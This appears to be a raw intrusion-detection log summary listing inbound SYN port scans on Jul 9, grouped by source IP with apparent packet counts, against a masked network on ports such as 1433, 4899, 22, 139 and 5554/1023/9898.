SYN ******S* Jul 9 20:08:13 139.30.123.148:3602 -> xxx.yyy.255.252:1433 SYN ******S* Jul 9 20:08:13 139.30.123.148:3605 -> xxx.yyy.255.253:1433 SYN ******S* Jul 9 20:08:13 139.30.123.148:3606 -> xxx.yyy.255.254:1433 SYN ******S* 74636 Jul 9 13:54:19 211.196.189.246:1132 -> xxx.yyy.1.1:1433 SYN ******S* Jul 9 13:54:19 211.196.189.246:1134 -> xxx.yyy.1.2:1433 SYN ******S* Jul 9 13:54:19 211.196.189.246:1138 -> xxx.yyy.1.4:1433 SYN ******S* Jul 9 13:54:19 211.196.189.246:1136 -> xxx.yyy.1.3:1433 SYN ******S* Jul 9 13:54:19 211.196.189.246:1140 -> xxx.yyy.1.5:1433 SYN ******S* Jul 9 13:54:19 211.196.189.246:1144 -> xxx.yyy.1.7:1433 SYN ******S* Jul 9 13:54:19 211.196.189.246:1142 -> xxx.yyy.1.6:1433 SYN ******S* Jul 9 13:54:19 211.196.189.246:1146 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 9 14:05:17 211.196.189.246:2997 -> xxx.yyy.255.245:1433 SYN ******S* Jul 9 14:05:17 211.196.189.246:3003 -> xxx.yyy.255.248:1433 SYN ******S* Jul 9 14:05:17 211.196.189.246:2993 -> xxx.yyy.255.243:1433 SYN ******S* Jul 9 14:05:17 211.196.189.246:2999 -> xxx.yyy.255.246:1433 SYN ******S* Jul 9 14:05:17 211.196.189.246:2991 -> xxx.yyy.255.242:1433 SYN ******S* Jul 9 14:05:17 211.196.189.246:3007 -> xxx.yyy.255.250:1433 SYN ******S* Jul 9 14:05:17 211.196.189.246:3011 -> xxx.yyy.255.252:1433 SYN ******S* Jul 9 14:05:17 211.196.189.246:3013 -> xxx.yyy.255.253:1433 SYN ******S* Jul 9 14:05:17 211.196.189.246:3015 -> xxx.yyy.255.254:1433 SYN ******S* 73032 Jul 9 06:47:57 130.191.84.17:2333 -> xxx.yyy.1.1:8000 SYN ******S* Jul 9 06:47:57 130.191.84.17:2334 -> xxx.yyy.1.2:8000 SYN ******S* Jul 9 06:47:57 130.191.84.17:2335 -> xxx.yyy.1.3:8000 SYN ******S* Jul 9 06:47:59 130.191.84.17:2336 -> xxx.yyy.1.4:8000 SYN ******S* Jul 9 06:47:59 130.191.84.17:2337 -> xxx.yyy.1.5:8000 SYN ******S* Jul 9 06:47:59 130.191.84.17:2338 -> xxx.yyy.1.6:8000 SYN ******S* Jul 9 06:47:59 130.191.84.17:2339 -> xxx.yyy.1.7:8000 SYN ******S* Jul 9 06:47:59 130.191.84.17:2340 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 9 06:58:51 130.191.84.17:1287 -> xxx.yyy.255.247:8000 SYN ******S* Jul 9 06:58:51 130.191.84.17:1284 -> xxx.yyy.255.244:8000 SYN ******S* Jul 9 06:58:51 130.191.84.17:1281 -> xxx.yyy.255.241:8000 SYN ******S* Jul 9 06:58:51 130.191.84.17:1288 -> xxx.yyy.255.248:8000 SYN ******S* Jul 9 06:58:51 130.191.84.17:1292 -> xxx.yyy.255.252:8000 SYN ******S* Jul 9 06:58:51 130.191.84.17:1293 -> xxx.yyy.255.253:8000 SYN ******S* Jul 9 06:58:51 130.191.84.17:1290 -> xxx.yyy.255.250:8000 SYN ******S* Jul 9 06:58:51 130.191.84.17:1294 -> xxx.yyy.255.254:8000 SYN ******S* Jul 9 06:58:51 130.191.84.17:1291 -> xxx.yyy.255.251:8000 SYN ******S* 72888 Jul 9 17:18:12 203.94.243.79:3978 -> xxx.yyy.1.1:1433 SYN ******S* Jul 9 17:18:12 203.94.243.79:3979 -> xxx.yyy.1.2:1433 SYN ******S* Jul 9 17:18:12 203.94.243.79:3980 -> xxx.yyy.1.3:1433 SYN ******S* Jul 9 17:18:12 203.94.243.79:3981 -> xxx.yyy.1.4:1433 SYN ******S* Jul 9 17:18:09 203.94.243.79:3982 -> xxx.yyy.1.5:1433 SYN ******S* Jul 9 17:18:09 203.94.243.79:3983 -> xxx.yyy.1.6:1433 SYN ******S* Jul 9 17:18:12 203.94.243.79:3984 -> xxx.yyy.1.7:1433 SYN ******S* Jul 9 17:18:12 203.94.243.79:3985 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 9 17:30:55 203.94.243.79:2240 -> xxx.yyy.255.243:1433 SYN ******S* Jul 9 17:30:55 203.94.243.79:2238 -> xxx.yyy.255.241:1433 SYN ******S* Jul 9 17:30:55 203.94.243.79:2248 -> xxx.yyy.255.251:1433 SYN ******S* Jul 9 17:30:55 203.94.243.79:2251 -> xxx.yyy.255.254:1433 SYN ******S* Jul 9 17:30:55 203.94.243.79:2246 -> xxx.yyy.255.249:1433 SYN ******S* Jul 9 17:30:55 203.94.243.79:2249 -> xxx.yyy.255.252:1433 SYN ******S* Jul 9 17:30:55 203.94.243.79:2245 -> xxx.yyy.255.248:1433 SYN ******S* Jul 9 17:30:55 203.94.243.79:2247 -> xxx.yyy.255.250:1433 SYN ******S* Jul 9 17:30:55 203.94.243.79:2250 -> xxx.yyy.255.253:1433 SYN ******S* 71340 Jul 9 19:37:01 213.237.79.218:4585 -> xxx.yyy.1.1:4000 SYN ******S* Jul 9 19:37:01 213.237.79.218:4586 -> xxx.yyy.1.2:4000 SYN ******S* Jul 9 19:37:01 213.237.79.218:4587 -> xxx.yyy.1.3:4000 SYN ******S* Jul 9 19:37:02 213.237.79.218:4588 -> xxx.yyy.1.4:4000 SYN ******S* Jul 9 19:37:02 213.237.79.218:4589 -> xxx.yyy.1.5:4000 SYN ******S* Jul 9 19:37:02 213.237.79.218:4590 -> xxx.yyy.1.6:4000 SYN ******S* Jul 9 19:37:02 213.237.79.218:4591 -> xxx.yyy.1.7:4000 SYN ******S* Jul 9 19:37:02 213.237.79.218:4592 -> xxx.yyy.1.8:4000 SYN ******S* [...] Jul 9 19:48:44 213.237.79.218:4431 -> xxx.yyy.255.146:4000 SYN ******S* Jul 9 19:48:44 213.237.79.218:4427 -> xxx.yyy.255.143:4000 SYN ******S* Jul 9 19:48:44 213.237.79.218:4438 -> xxx.yyy.255.153:4000 SYN ******S* Jul 9 19:48:44 213.237.79.218:4439 -> xxx.yyy.255.154:4000 SYN ******S* Jul 9 19:48:44 213.237.79.218:4440 -> xxx.yyy.255.155:4000 SYN ******S* Jul 9 19:48:45 213.237.79.218:4451 -> xxx.yyy.255.166:4000 SYN ******S* Jul 9 19:48:45 213.237.79.218:4449 -> xxx.yyy.255.164:4000 SYN ******S* Jul 9 19:48:45 213.237.79.218:4450 -> xxx.yyy.255.165:4000 SYN ******S* 70976 Jul 9 17:00:52 61.77.160.67:3004 -> xxx.yyy.1.5:1433 SYN ******S* Jul 9 17:00:52 61.77.160.67:3005 -> xxx.yyy.1.6:1433 SYN ******S* Jul 9 17:00:52 61.77.160.67:3007 -> xxx.yyy.1.8:1433 SYN ******S* Jul 9 17:00:52 61.77.160.67:3008 -> xxx.yyy.1.9:1433 SYN ******S* Jul 9 17:00:52 61.77.160.67:3011 -> xxx.yyy.1.12:1433 SYN ******S* Jul 9 17:00:49 61.77.160.67:3000 -> xxx.yyy.1.1:1433 SYN ******S* Jul 9 17:00:52 61.77.160.67:3013 -> xxx.yyy.1.14:1433 SYN ******S* Jul 9 17:00:49 61.77.160.67:3001 -> xxx.yyy.1.2:1433 SYN ******S* [...] Jul 9 17:05:51 61.77.160.67:1866 -> xxx.yyy.255.232:1433 SYN ******S* Jul 9 17:05:51 61.77.160.67:1850 -> xxx.yyy.255.216:1433 SYN ******S* Jul 9 17:05:51 61.77.160.67:1847 -> xxx.yyy.255.213:1433 SYN ******S* Jul 9 17:05:51 61.77.160.67:1863 -> xxx.yyy.255.229:1433 SYN ******S* Jul 9 17:05:51 61.77.160.67:1815 -> xxx.yyy.255.181:1433 SYN ******S* Jul 9 17:05:51 61.77.160.67:1867 -> xxx.yyy.255.233:1433 SYN ******S* Jul 9 17:05:51 61.77.160.67:1854 -> xxx.yyy.255.220:1433 SYN ******S* Jul 9 17:05:51 61.77.160.67:1819 -> xxx.yyy.255.185:1433 SYN ******S* 66564 Jul 9 01:03:09 206.45.126.95:3390 -> xxx.yyy.1.1:4899 SYN ******S* Jul 9 01:03:09 206.45.126.95:3395 -> xxx.yyy.1.2:4899 SYN ******S* Jul 9 01:03:09 206.45.126.95:3400 -> xxx.yyy.1.3:4899 SYN ******S* Jul 9 01:03:08 206.45.126.95:3413 -> xxx.yyy.1.4:4899 SYN ******S* Jul 9 01:03:08 206.45.126.95:3424 -> xxx.yyy.1.5:4899 SYN ******S* Jul 9 01:03:08 206.45.126.95:3436 -> xxx.yyy.1.6:4899 SYN ******S* Jul 9 01:03:08 206.45.126.95:3444 -> xxx.yyy.1.7:4899 SYN ******S* Jul 9 01:03:08 206.45.126.95:3446 -> xxx.yyy.1.8:4899 SYN ******S* [...] Jul 9 01:33:35 206.45.126.95:3757 -> xxx.yyy.255.242:4899 SYN ******S* Jul 9 01:33:35 206.45.126.95:3798 -> xxx.yyy.255.247:4899 SYN ******S* Jul 9 01:33:35 206.45.126.95:3803 -> xxx.yyy.255.248:4899 SYN ******S* Jul 9 01:33:35 206.45.126.95:3811 -> xxx.yyy.255.249:4899 SYN ******S* Jul 9 01:33:35 206.45.126.95:3813 -> xxx.yyy.255.250:4899 SYN ******S* Jul 9 01:33:35 206.45.126.95:3818 -> xxx.yyy.255.251:4899 SYN ******S* Jul 9 01:33:35 206.45.126.95:3819 -> xxx.yyy.255.252:4899 SYN ******S* Jul 9 01:33:35 206.45.126.95:3821 -> xxx.yyy.255.253:4899 SYN ******S* Jul 9 01:33:35 206.45.126.95:3827 -> xxx.yyy.255.254:4899 SYN ******S* 56345 Jul 9 15:32:01 211.234.110.90:1763 -> xxx.yyy.1.1:4899 SYN ******S* Jul 9 15:32:01 211.234.110.90:1764 -> xxx.yyy.1.2:4899 SYN ******S* Jul 9 15:32:01 211.234.110.90:1765 -> xxx.yyy.1.3:4899 SYN ******S* Jul 9 15:31:59 211.234.110.90:1766 -> xxx.yyy.1.4:4899 SYN ******S* Jul 9 15:31:59 211.234.110.90:1767 -> xxx.yyy.1.5:4899 SYN ******S* Jul 9 15:31:59 211.234.110.90:1768 -> xxx.yyy.1.6:4899 SYN ******S* Jul 9 15:31:59 211.234.110.90:1770 -> xxx.yyy.1.8:4899 SYN ******S* Jul 9 15:31:59 211.234.110.90:1769 -> xxx.yyy.1.7:4899 SYN ******S* [...] Jul 9 15:35:21 211.234.110.90:4318 -> xxx.yyy.255.247:4899 SYN ******S* Jul 9 15:35:21 211.234.110.90:4319 -> xxx.yyy.255.248:4899 SYN ******S* Jul 9 15:35:21 211.234.110.90:4320 -> xxx.yyy.255.249:4899 SYN ******S* Jul 9 15:35:21 211.234.110.90:4321 -> xxx.yyy.255.250:4899 SYN ******S* Jul 9 15:35:21 211.234.110.90:4322 -> xxx.yyy.255.251:4899 SYN ******S* Jul 9 15:35:21 211.234.110.90:4323 -> xxx.yyy.255.252:4899 SYN ******S* Jul 9 15:35:21 211.234.110.90:4324 -> xxx.yyy.255.253:4899 SYN ******S* Jul 9 15:35:21 211.234.110.90:4325 -> xxx.yyy.255.254:4899 SYN ******S* 42547 Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.1.105:22 SYN ******S* Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.1.236:22 SYN ******S* Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.10.28:22 SYN ******S* Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.11.34:22 SYN ******S* Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.12.171:22 SYN ******S* Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.13.177:22 SYN ******S* Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.14.183:22 SYN ******S* Jul 9 13:33:10 129.125.52.108:3001 -> xxx.yyy.15.58:22 SYN ******S* [...] Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.245.174:22 SYN ******S* Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.246.49:22 SYN ******S* Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.246.180:22 SYN ******S* Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.247.186:22 SYN ******S* Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.248.192:22 SYN ******S* Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.250.73:22 SYN ******S* Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.253.222:22 SYN ******S* Jul 9 13:51:00 129.125.52.108:3001 -> xxx.yyy.255.103:22 SYN ******S* 27553 Jul 9 23:47:29 221.216.67.206:4482 -> xxx.yyy.215.213:5554 SYN ******S* Jul 9 23:47:30 221.216.67.206:1148 -> xxx.yyy.215.213:1023 SYN ******S* Jul 9 23:47:32 221.216.67.206:1966 -> xxx.yyy.215.213:9898 SYN ******S* Jul 9 23:47:29 221.216.67.206:4492 -> xxx.yyy.215.219:5554 SYN ******S* Jul 9 23:47:30 221.216.67.206:1159 -> xxx.yyy.215.219:1023 SYN ******S* Jul 9 23:47:32 221.216.67.206:2018 -> xxx.yyy.215.219:9898 SYN ******S* Jul 9 23:47:29 221.216.67.206:4486 -> xxx.yyy.215.210:5554 SYN ******S* Jul 9 23:47:30 221.216.67.206:1150 -> xxx.yyy.215.210:1023 SYN ******S* [...] Jul 9 23:48:31 221.216.67.206:2138 -> xxx.yyy.236.74:9898 SYN ******S* Jul 9 23:48:31 221.216.67.206:2141 -> xxx.yyy.236.64:9898 SYN ******S* Jul 9 23:48:31 221.216.67.206:1985 -> xxx.yyy.236.25:9898 SYN ******S* Jul 9 23:48:31 221.216.67.206:2257 -> xxx.yyy.217.156:9898 SYN ******S* Jul 9 23:48:31 221.216.67.206:2256 -> xxx.yyy.217.158:9898 SYN ******S* Jul 9 23:48:31 221.216.67.206:2317 -> xxx.yyy.217.143:9898 SYN ******S* Jul 9 23:48:31 221.216.67.206:2316 -> xxx.yyy.217.157:9898 SYN ******S* Jul 9 23:48:31 221.216.67.206:2323 -> xxx.yyy.217.155:9898 SYN ******S* 15407 Jul 9 23:56:43 220.121.242.156:2324 -> xxx.yyy.72.137:5554 SYN ******S* Jul 9 23:56:44 220.121.242.156:2789 -> xxx.yyy.72.137:1023 SYN ******S* Jul 9 23:56:43 220.121.242.156:2330 -> xxx.yyy.72.131:5554 SYN ******S* Jul 9 23:56:44 220.121.242.156:2792 -> xxx.yyy.72.131:1023 SYN ******S* Jul 9 23:56:43 220.121.242.156:2332 -> xxx.yyy.72.129:5554 SYN ******S* Jul 9 23:56:44 220.121.242.156:2793 -> xxx.yyy.72.129:1023 SYN ******S* Jul 9 23:56:43 220.121.242.156:2331 -> xxx.yyy.72.130:5554 SYN ******S* Jul 9 23:56:44 220.121.242.156:2824 -> xxx.yyy.72.130:1023 SYN ******S* [...] Jul 9 23:57:32 220.121.242.156:2828 -> xxx.yyy.92.240:9898 SYN ******S* Jul 9 23:57:32 220.121.242.156:2831 -> xxx.yyy.92.243:9898 SYN ******S* Jul 9 23:57:32 220.121.242.156:2830 -> xxx.yyy.92.242:9898 SYN ******S* Jul 9 23:57:32 220.121.242.156:2813 -> xxx.yyy.92.234:9898 SYN ******S* Jul 9 23:57:32 220.121.242.156:2814 -> xxx.yyy.92.235:9898 SYN ******S* Jul 9 23:57:32 220.121.242.156:2851 -> xxx.yyy.92.246:9898 SYN ******S* Jul 9 23:57:32 220.121.242.156:2824 -> xxx.yyy.92.236:9898 SYN ******S* Jul 9 23:57:32 220.121.242.156:2832 -> xxx.yyy.92.244:9898 SYN ******S* 15016 Jul 9 23:56:24 220.124.154.238:2818 -> xxx.yyy.153.136:5554 SYN ******S* Jul 9 23:56:25 220.124.154.238:3256 -> xxx.yyy.153.136:1023 SYN ******S* Jul 9 23:56:27 220.124.154.238:4182 -> xxx.yyy.153.136:9898 SYN ******S* Jul 9 23:56:24 220.124.154.238:2821 -> xxx.yyy.153.140:5554 SYN ******S* Jul 9 23:56:25 220.124.154.238:3261 -> xxx.yyy.153.140:1023 SYN ******S* Jul 9 23:56:27 220.124.154.238:4188 -> xxx.yyy.153.140:9898 SYN ******S* Jul 9 23:56:24 220.124.154.238:2822 -> xxx.yyy.153.141:5554 SYN ******S* Jul 9 23:56:25 220.124.154.238:3262 -> xxx.yyy.153.141:1023 SYN ******S* [...] Jul 9 23:57:09 220.124.154.238:3045 -> xxx.yyy.173.51:9898 SYN ******S* Jul 9 23:57:09 220.124.154.238:3055 -> xxx.yyy.173.53:9898 SYN ******S* Jul 9 23:57:09 220.124.154.238:3052 -> xxx.yyy.173.52:9898 SYN ******S* Jul 9 23:57:09 220.124.154.238:3062 -> xxx.yyy.173.55:9898 SYN ******S* Jul 9 23:57:09 220.124.154.238:3057 -> xxx.yyy.173.54:9898 SYN ******S* Jul 9 23:57:09 220.124.154.238:3063 -> xxx.yyy.173.56:9898 SYN ******S* Jul 9 23:57:09 220.124.154.238:3064 -> xxx.yyy.173.57:9898 SYN ******S* Jul 9 23:57:10 220.124.154.238:3077 -> xxx.yyy.173.58:9898 SYN ******S* Jul 9 23:57:10 220.124.154.238:3096 -> xxx.yyy.173.59:9898 SYN ******S* 14917 Jul 9 09:20:11 62.201.107.204:3043 -> xxx.yyy.1.1:1433 SYN ******S* Jul 9 09:20:11 62.201.107.204:3044 -> xxx.yyy.1.2:1433 SYN ******S* Jul 9 09:20:11 62.201.107.204:3045 -> xxx.yyy.1.3:1433 SYN ******S* Jul 9 09:20:14 62.201.107.204:3046 -> xxx.yyy.1.4:1433 SYN ******S* Jul 9 09:20:14 62.201.107.204:3047 -> xxx.yyy.1.5:1433 SYN ******S* Jul 9 09:20:14 62.201.107.204:3048 -> xxx.yyy.1.6:1433 SYN ******S* Jul 9 09:20:11 62.201.107.204:3049 -> xxx.yyy.1.7:1433 SYN ******S* Jul 9 09:20:11 62.201.107.204:3050 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 9 09:24:40 62.201.107.204:4398 -> xxx.yyy.87.234:1433 SYN ******S* Jul 9 09:24:40 62.201.107.204:4399 -> xxx.yyy.87.235:1433 SYN ******S* Jul 9 09:24:40 62.201.107.204:4401 -> xxx.yyy.87.237:1433 SYN ******S* Jul 9 09:24:40 62.201.107.204:4402 -> xxx.yyy.87.238:1433 SYN ******S* Jul 9 09:24:40 62.201.107.204:4403 -> xxx.yyy.87.239:1433 SYN ******S* Jul 9 09:24:40 62.201.107.204:4404 -> xxx.yyy.87.240:1433 SYN ******S* Jul 9 09:24:40 62.201.107.204:4405 -> xxx.yyy.87.241:1433 SYN ******S* Jul 9 09:24:40 62.201.107.204:4406 -> xxx.yyy.87.242:1433 SYN ******S* Jul 9 09:24:40 62.201.107.204:4407 -> xxx.yyy.87.243:1433 SYN ******S* 14313 Jul 9 00:56:11 218.24.185.215:4091 -> xxx.yyy.174.60:5554 SYN ******S* Jul 9 00:56:12 218.24.185.215:4850 -> xxx.yyy.174.60:1023 SYN ******S* Jul 9 00:56:14 218.24.185.215:1849 -> xxx.yyy.174.60:9898 SYN ******S* Jul 9 00:56:11 218.24.185.215:4093 -> xxx.yyy.174.57:5554 SYN ******S* Jul 9 00:56:12 218.24.185.215:4854 -> xxx.yyy.174.57:1023 SYN ******S* Jul 9 00:56:14 218.24.185.215:1851 -> xxx.yyy.174.57:9898 SYN ******S* Jul 9 00:56:11 218.24.185.215:4092 -> xxx.yyy.174.58:5554 SYN ******S* Jul 9 00:56:12 218.24.185.215:4852 -> xxx.yyy.174.58:1023 SYN ******S* [...] Jul 9 00:56:58 218.24.185.215:1153 -> xxx.yyy.194.117:9898 SYN ******S* Jul 9 00:56:58 218.24.185.215:1161 -> xxx.yyy.194.118:9898 SYN ******S* Jul 9 00:56:58 218.24.185.215:1162 -> xxx.yyy.194.120:9898 SYN ******S* Jul 9 00:56:58 218.24.185.215:1163 -> xxx.yyy.194.121:9898 SYN ******S* Jul 9 00:56:58 218.24.185.215:1173 -> xxx.yyy.194.122:9898 SYN ******S* Jul 9 00:56:58 218.24.185.215:1174 -> xxx.yyy.194.123:9898 SYN ******S* Jul 9 00:56:58 218.24.185.215:1175 -> xxx.yyy.194.124:9898 SYN ******S* Jul 9 00:56:58 218.24.185.215:1179 -> xxx.yyy.194.119:9898 SYN ******S* 13033 Jul 9 00:56:48 211.161.154.71:3646 -> xxx.yyy.174.224:5554 SYN ******S* Jul 9 00:56:49 211.161.154.71:4261 -> xxx.yyy.174.224:1023 SYN ******S* Jul 9 00:56:51 211.161.154.71:1738 -> xxx.yyy.174.224:9898 SYN ******S* Jul 9 00:56:48 211.161.154.71:3647 -> xxx.yyy.174.222:5554 SYN ******S* Jul 9 00:56:49 211.161.154.71:4331 -> xxx.yyy.174.222:1023 SYN ******S* Jul 9 00:56:51 211.161.154.71:1755 -> xxx.yyy.174.222:9898 SYN ******S* Jul 9 00:56:48 211.161.154.71:3648 -> xxx.yyy.174.225:5554 SYN ******S* Jul 9 00:56:49 211.161.154.71:4265 -> xxx.yyy.174.225:1023 SYN ******S* [...] Jul 9 00:57:37 211.161.154.71:1271 -> xxx.yyy.195.83:9898 SYN ******S* Jul 9 00:57:37 211.161.154.71:1273 -> xxx.yyy.195.85:9898 SYN ******S* Jul 9 00:57:37 211.161.154.71:1277 -> xxx.yyy.195.88:9898 SYN ******S* Jul 9 00:57:37 211.161.154.71:1276 -> xxx.yyy.195.81:9898 SYN ******S* Jul 9 00:57:37 211.161.154.71:1278 -> xxx.yyy.195.84:9898 SYN ******S* Jul 9 00:57:37 211.161.154.71:1280 -> xxx.yyy.195.86:9898 SYN ******S* Jul 9 00:57:37 211.161.154.71:1281 -> xxx.yyy.195.87:9898 SYN ******S* Jul 9 00:57:37 211.161.154.71:1314 -> xxx.yyy.174.223:9898 SYN ******S* 12925 Jul 9 00:56:19 221.200.12.187:2950 -> xxx.yyy.71.160:5554 SYN ******S* Jul 9 00:56:20 221.200.12.187:3443 -> xxx.yyy.71.160:1023 SYN ******S* Jul 9 00:56:22 221.200.12.187:4673 -> xxx.yyy.71.160:9898 SYN ******S* Jul 9 00:56:19 221.200.12.187:2951 -> xxx.yyy.71.161:5554 SYN ******S* Jul 9 00:56:22 221.200.12.187:4674 -> xxx.yyy.71.161:9898 SYN ******S* Jul 9 00:56:19 221.200.12.187:2952 -> xxx.yyy.71.162:5554 SYN ******S* Jul 9 00:56:22 221.200.12.187:4677 -> xxx.yyy.71.162:9898 SYN ******S* Jul 9 00:56:19 221.200.12.187:2954 -> xxx.yyy.71.164:5554 SYN ******S* [...] Jul 9 00:57:05 221.200.12.187:2085 -> xxx.yyy.92.25:9898 SYN ******S* Jul 9 00:57:05 221.200.12.187:2082 -> xxx.yyy.92.22:9898 SYN ******S* Jul 9 00:57:05 221.200.12.187:2084 -> xxx.yyy.92.24:9898 SYN ******S* Jul 9 00:57:05 221.200.12.187:2087 -> xxx.yyy.71.214:9898 SYN ******S* Jul 9 00:57:05 221.200.12.187:2088 -> xxx.yyy.71.215:9898 SYN ******S* Jul 9 00:57:05 221.200.12.187:2092 -> xxx.yyy.71.217:9898 SYN ******S* Jul 9 00:57:05 221.200.12.187:2089 -> xxx.yyy.71.216:9898 SYN ******S* Jul 9 00:57:05 221.200.12.187:2093 -> xxx.yyy.71.218:9898 SYN ******S* Jul 9 00:57:05 221.200.12.187:2094 -> xxx.yyy.71.219:9898 SYN ******S* 11467 Jul 9 06:56:27 212.145.209.19:4310 -> xxx.yyy.194.124:5554 SYN ******S* Jul 9 06:56:28 212.145.209.19:4628 -> xxx.yyy.194.124:1023 SYN ******S* Jul 9 06:56:29 212.145.209.19:4698 -> xxx.yyy.194.124:9898 SYN ******S* Jul 9 06:56:27 212.145.209.19:4311 -> xxx.yyy.194.125:5554 SYN ******S* Jul 9 06:56:28 212.145.209.19:4633 -> xxx.yyy.194.125:1023 SYN ******S* Jul 9 06:56:29 212.145.209.19:4700 -> xxx.yyy.194.125:9898 SYN ******S* Jul 9 06:56:27 212.145.209.19:4324 -> xxx.yyy.194.126:5554 SYN ******S* Jul 9 06:56:28 212.145.209.19:4636 -> xxx.yyy.194.126:1023 SYN ******S* [...] Jul 9 06:58:08 212.145.209.19:2150 -> xxx.yyy.196.58:5554 SYN ******S* Jul 9 06:58:08 212.145.209.19:2637 -> xxx.yyy.196.58:1023 SYN ******S* Jul 9 06:58:09 212.145.209.19:1630 -> xxx.yyy.196.58:9898 SYN ******S* Jul 9 06:58:08 212.145.209.19:2163 -> xxx.yyy.196.60:5554 SYN ******S* Jul 9 06:58:09 212.145.209.19:2649 -> xxx.yyy.196.60:1023 SYN ******S* Jul 9 06:58:09 212.145.209.19:1640 -> xxx.yyy.196.60:9898 SYN ******S* Jul 9 06:58:08 212.145.209.19:2170 -> xxx.yyy.196.61:5554 SYN ******S* Jul 9 06:58:09 212.145.209.19:2683 -> xxx.yyy.196.61:1023 SYN ******S* Jul 9 06:58:09 212.145.209.19:2399 -> xxx.yyy.196.61:9898 SYN ******S* 11373 Jul 9 10:04:49 202.61.212.40:3054 -> xxx.yyy.1.5:1433 SYN ******S* Jul 9 10:04:51 202.61.212.40:1394 -> xxx.yyy.1.15:1433 SYN ******S* Jul 9 10:04:51 202.61.212.40:4216 -> xxx.yyy.1.16:1433 SYN ******S* Jul 9 10:04:51 202.61.212.40:3417 -> xxx.yyy.1.6:1433 SYN ******S* Jul 9 10:04:51 202.61.212.40:4653 -> xxx.yyy.1.11:1433 SYN ******S* Jul 9 10:04:51 202.61.212.40:2583 -> xxx.yyy.1.3:1433 SYN ******S* Jul 9 10:04:52 202.61.212.40:4580 -> xxx.yyy.1.4:1433 SYN ******S* Jul 9 10:04:49 202.61.212.40:1777 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 9 11:51:30 202.61.212.40:3710 -> xxx.yyy.111.255:1433 SYN ******S* Jul 9 11:51:30 202.61.212.40:2218 -> xxx.yyy.111.244:1433 SYN ******S* Jul 9 11:51:31 202.61.212.40:2530 -> xxx.yyy.111.245:1433 SYN ******S* Jul 9 11:51:31 202.61.212.40:2645 -> xxx.yyy.111.246:1433 SYN ******S* Jul 9 11:51:31 202.61.212.40:2760 -> xxx.yyy.111.247:1433 SYN ******S* Jul 9 11:51:31 202.61.212.40:2959 -> xxx.yyy.111.249:1433 SYN ******S* Jul 9 11:51:32 202.61.212.40:3095 -> xxx.yyy.111.250:1433 SYN ******S* Jul 9 11:51:32 202.61.212.40:3190 -> xxx.yyy.111.251:1433 SYN ******S* Jul 9 11:51:32 202.61.212.40:3321 -> xxx.yyy.111.252:1433 SYN ******S* 9934 Jul 9 00:56:23 61.149.177.106:3403 -> xxx.yyy.214.246:5554 SYN ******S* Jul 9 00:56:24 61.149.177.106:4134 -> xxx.yyy.214.246:1023 SYN ******S* Jul 9 00:56:23 61.149.177.106:3419 -> xxx.yyy.214.250:5554 SYN ******S* Jul 9 00:56:24 61.149.177.106:4147 -> xxx.yyy.214.250:1023 SYN ******S* Jul 9 00:56:23 61.149.177.106:3420 -> xxx.yyy.214.251:5554 SYN ******S* Jul 9 00:56:24 61.149.177.106:4148 -> xxx.yyy.214.251:1023 SYN ******S* Jul 9 00:56:26 61.149.177.106:1797 -> xxx.yyy.214.251:9898 SYN ******S* Jul 9 00:56:23 61.149.177.106:3480 -> xxx.yyy.214.253:5554 SYN ******S* [...] Jul 9 00:57:12 61.149.177.106:2418 -> xxx.yyy.235.90:9898 SYN ******S* Jul 9 00:57:12 61.149.177.106:2342 -> xxx.yyy.235.67:9898 SYN ******S* Jul 9 00:57:12 61.149.177.106:2433 -> xxx.yyy.235.86:9898 SYN ******S* Jul 9 00:57:12 61.149.177.106:2471 -> xxx.yyy.235.74:9898 SYN ******S* Jul 9 00:57:12 61.149.177.106:2515 -> xxx.yyy.235.105:9898 SYN ******S* Jul 9 00:57:12 61.149.177.106:2558 -> xxx.yyy.235.103:9898 SYN ******S* Jul 9 00:57:12 61.149.177.106:2570 -> xxx.yyy.235.112:9898 SYN ******S* Jul 9 00:57:12 61.149.177.106:2566 -> xxx.yyy.235.108:9898 SYN ******S* 9810 Jul 9 17:14:20 221.185.83.34:3526 -> xxx.yyy.1.1:139 SYN ******S* Jul 9 17:14:20 221.185.83.34:3534 -> xxx.yyy.1.2:139 SYN ******S* Jul 9 17:14:20 221.185.83.34:3545 -> xxx.yyy.1.3:139 SYN ******S* Jul 9 17:14:20 221.185.83.34:3560 -> xxx.yyy.1.4:139 SYN ******S* Jul 9 17:14:20 221.185.83.34:3575 -> xxx.yyy.1.5:139 SYN ******S* Jul 9 17:14:20 221.185.83.34:3577 -> xxx.yyy.1.6:139 SYN ******S* Jul 9 17:14:20 221.185.83.34:3587 -> xxx.yyy.1.7:139 SYN ******S* Jul 9 17:14:20 221.185.83.34:3593 -> xxx.yyy.1.8:139 SYN ******S* [...] Jul 9 17:43:13 221.185.83.34:4789 -> xxx.yyy.32.248:139 SYN ******S* Jul 9 17:43:13 221.185.83.34:4781 -> xxx.yyy.32.247:139 SYN ******S* Jul 9 17:43:13 221.185.83.34:4802 -> xxx.yyy.32.250:139 SYN ******S* Jul 9 17:43:13 221.185.83.34:4819 -> xxx.yyy.32.251:139 SYN ******S* Jul 9 17:43:13 221.185.83.34:4796 -> xxx.yyy.32.249:139 SYN ******S* Jul 9 17:43:13 221.185.83.34:4827 -> xxx.yyy.32.254:139 SYN ******S* Jul 9 17:43:13 221.185.83.34:4828 -> xxx.yyy.32.255:139 SYN ******S* Jul 9 17:43:13 221.185.83.34:4823 -> xxx.yyy.32.252:139 SYN ******S* Jul 9 17:43:13 221.185.83.34:4824 -> xxx.yyy.32.253:139 